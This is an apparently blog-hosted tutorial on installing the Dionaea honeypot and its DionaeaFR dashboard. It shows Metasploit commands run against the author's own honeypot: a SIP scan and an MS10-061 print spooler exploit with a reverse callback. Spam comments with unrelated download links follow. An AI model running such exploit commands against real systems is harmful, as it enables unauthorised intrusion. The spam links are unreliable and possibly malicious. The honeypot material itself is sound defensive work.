Dionaea
– A Malware collection honeypot
Introduction
This post outlines the necessary requirements, configurations and step by step installation procedure for honeypot Dionaea. It also briefs the logging of various attacks from external entities and produces the results to a dashboard interface feature for ease of understanding.
Dionaea
Dionaea is one of the modern malware collection honeypots that’s aimed to trap malware exploiting vulnerabilities exposed by services offered over a network to obtain a copy of malware. Dionaea emulates protocols by embedding python as its scripting language and also detects shellcodes using LibEmu. It also supports IPv6 and TLS. Dionaea traps malware from below mentioned protocols.
• SMB (Server Message Block):
• HTTP (Hyper Text Transfer Protocol)
• FTP (File Transfer Protocol)
• TFTP (Trivial File Transfer Protocol)
• MSSQL (Microsoft SQL Server)
• VoIP (Voice over IP)
Requirements
Ubuntu 12.04 LTS Server
Configuration
· sudo
apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev
libreadline-dev libsqlite3-dev python-dev libtool automake autoconf
build-essential subversion git-core flex bison pkg-config libgc-dev libgc1c2 sqlite3
python-geoip sqlite python-pip
· Create
/opt/dionaea/ directory
mkdir
/opt/dionaea/
· Create
temp directory for installation
mkdir
~/src
· Install
Liblcfg Package
cd
~/src
git
clone git://git.carnivore.it/liblcfg.git liblcfg
cd
liblcfg/code
autoreconf
-vi
./configure
--prefix=/opt/dionaea
make
install
· Install
Libemu package
cd
~/src
git
clone git://git.carnivore.it/libemu.git libemu
cd
libemu
autoreconf
-vi
./configure
--prefix=/opt/dionaea
ldconfig
· Install
Libnl
Incase
of Ubuntu
apt-get
install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
or
else install it from git
cd
~/src
git
clone git://git.infradead.org/users/tgr/libnl.git
cd
libnl
autoreconf
-vi
export
LDFLAGS=-Wl,-rpath,/opt/dionaea/lib
./configure
--prefix=/opt/dionaea
make
make
install
ldconfig
· Install
Libev
tar
-xvzf libev-4.04.tar.gz
cd
libev-4.04
make
install
· Install
python 3.2
cd
~/src
tar
xfz Python-3.2.2.tgz
./configure
--enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6
LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/"
make
make
install
ldconfig
· Install
Cython
cd
~/src
tar
xfz Cython-0.21rc1.tar.gz
cd
Cython-0.21rc1
/opt/dionaea/bin/python3
setup.py install
ldconfig
· Install
Libcurl
sudo
apt-get install curl libc6 libcurl3 zlib1g
· Install
Libpcap
tar
xfz libpcap-1.6.2.tar.gz
cd
libpcap-1.6.2
./configure
--prefix=/opt/dionaea
make
make
install
ldconfig
· Install
p0f
apt-get
install p0f -y
cd
/
mkdir
nonexistent
chown
-R nobody:nogroup nonexistent
· Clone
Dionaea from github
cd
~/src
git
clone git://git.carnivore.it/dionaea.git dionaea
· Compile
Dionaea
cd
~/src/dionaea
autoreconf
–vi
./configure
--with-lcfg-include=/opt/dionaea/include/ \
--with-lcfg-lib=/opt/dionaea/lib/ \
--with-python=/opt/dionaea/bin/python3.2 \
--with-cython-dir=/opt/dionaea/bin \
--with-udns-include=/opt/dionaea/include/
\
--with-udns-lib=/opt/dionaea/lib/ \
--with-emu-include=/opt/dionaea/include/ \
--with-emu-lib=/opt/dionaea/lib/ \
--with-gc-include=/usr/include/gc \
--with-ev-include=/opt/dionaea/include \
--with-ev-lib=/opt/dionaea/lib \
--with-nl-include=/opt/dionaea/include \
--with-nl-lib=/opt/dionaea/lib/ \
--with-curl-config=/usr/bin/ \
--with-pcap-include=/opt/dionaea/include \
--with-pcap-lib=/opt/dionaea/lib/
make
make
install
· Test
Dionaea installation
/opt/dionaea/bin/dionaea
--help
/opt/dionaea/bin/dionaea
-r /opt/dionaea
DionaeaFR – Dashboard
· Install
pip (Python package manager) and python-netaddr package
apt-get
install python-pip python-netaddr
· Install
prerequisites using pip
pip
install Django
pip
install pygeoip
pip
install django-pagination
pip
install django-tables2
pip
install django-compressor
pip
install django-htmlmin
· Install
django-tables2-simplefilter
cd
/opt/
unzip
django-tables2-simplefilter.zip
mv
django-tables2-simplefilter-master/ django-tables2-simplefilter/
cd
django-tables2-simplefilter/
python
setup.py install
· Install
PySubnetTree
cd
/opt/
git
clone https://github.com/bro/pysubnettree.git
cd
pysubnettree/
python
setup.py install
· Compile
and install Node.js from sources
cd
/opt/
tar
xzvf node-v0.8.16.tar.gz
cd
node-v0.8.16
./configure
make
make
install
· Install
LESS using npm
npm
install -g less
· Download
DionaeaFR
unzip
DionaeaFR.zip
mv
DionaeaFR-master/ DionaeaFR
· Get
Maxmind’s GeoIP and GeoLite databases
cd
/opt/
gunzip
GeoLiteCity.dat.gz
gunzip
GeoIP.dat.gz
mv
GeoIP.dat DionaeaFR/DionaeaFR/static
mv
GeoLiteCity.dat DionaeaFR/DionaeaFR/static
· If
Dionaea installation doesn’t follow official Dionaea installation guide, the line 17 in /opt/DionaeaFR/DionaeaFR/settings.py should be set to dionaea’s sqlite db
· Change
STATIC_ROOT variable in settings.py “Dionaea FR’s folder/static/”
· To
start DionaeaFR
cd
/opt/DionaeaFR/
sudo
python manage.py collectstatic #type yes
when asked
sudo
python manage.py runserver 0.0.0.0:8080
· DionaeaFR’s
interface can also accessible via remote
Logging
Run Dionaea to start enabling logging. Here, Dionaea is running with IP 192.168.0.109 and check for network connections status using netstat
· /opt/dionaea/bin/dionaea
-r /opt/Dionaea
· netstat
–ntlp | grep 192.168.0.109
A nmap scan on 192.168.0.109 has come up with above ports as opened and services can be exploited with the vulnerabilities associated to them for example, to do more reconnaissance on SIP it can be scanned with various options using metasploit auxiliary. Meanwhile Dionaea picks up the traffic while metasploit auxiliary scanning is going on. The scanning traffic has been logged as shown in below fig.
The auxiliary SIP Options scan on Port 5060
• msfcli auxiliary/scanner/sip/options CHOST=192.168.0.169 CPORT=5066 RHOST=192.168.0.109 RPORT=5060 E
Looking into the Dionaea log file located at /opt/Dionaea/var/log/dionaea.log, we can investigate into connection traffic and find out possible attack indicators. But, querying dionaea’s LogSQL SQLite database using a python script readlogsqltree gives the better understandable output. It can also give information logged on each incident with exploited vulnerability, time, attacker, information about shellcodes.
• python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
Now let’s exploit the vulnerability (MS10-061) in print spool service which could allow remote code execution. Since Dionaea emulates SMB service to trap the malware now let’s exploit the remote code execution vulnerability in print spooler service on windows systems.
• msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.0.109 EXITFUNC=process LHOST=192.168.0.169 LPORT=4444 E
Dionaea detects and pick up the incidents as shown in below figure
Let’s check the /opt/dionaea/var/dionaea/binaries directory to see whether dionaea captured any binary executable or not. Here we go
Meanwhile querying the Dionaea’s LogSQL SQLite database can give better understanding of the traffic hit by attack
• python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
• python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
Dashboard
DionaeaFR is a frontend dashboard interface to visualize the results of Dionaea honeypot. It provides the connections, downloaded malwares and attacker’s geo locations. It can also filter out the results based on states, protocols, services, ports and remote ports. It runs on local machine and also accessible remotely. To run the DionaeaFR
• cd /opt/DionaeaFR
sudo python manage.py collectstatic #type yes when asked
sudo python manage.py runserver 0.0.0.0:8080
Using filters the SIP sessions service can be seen in below figure
The downloaded malwares can be seen in the dashboard interface
Conclusion
The collected malwares can be analyzed further to better understand the attacks. The geo locations of the attackers can be seen in dashboard maps interface. The dashboard interface can also be accessible remotely for interactive monitoring.
Thank you, it was very helpful.
ReplyDeleteyou are welcome !! few more important posts to come !
ReplyDeleteGood Post (y)
ReplyDeletecoecesuffgi Amber Helmbrecht https://wakelet.com/wake/45oc5ggc6TnCsJOsnTcqS
ReplyDeleteanfarale
provalVmons_po-Omaha Courtney Oliver https://colab.research.google.com/drive/1gQ7toFZol7uT-zs9dAZKuByaXW89IaoP
ReplyDeleteclick here
click here
click
viewragolem
MpercomOfi-zo Leah Lundwall WinRar
ReplyDeleteInstall
Microsoft Visio Professional
penanwoodbhou
ObrevlaeAguio Jacobi Greene Programs
ReplyDeleteClick
arnolegat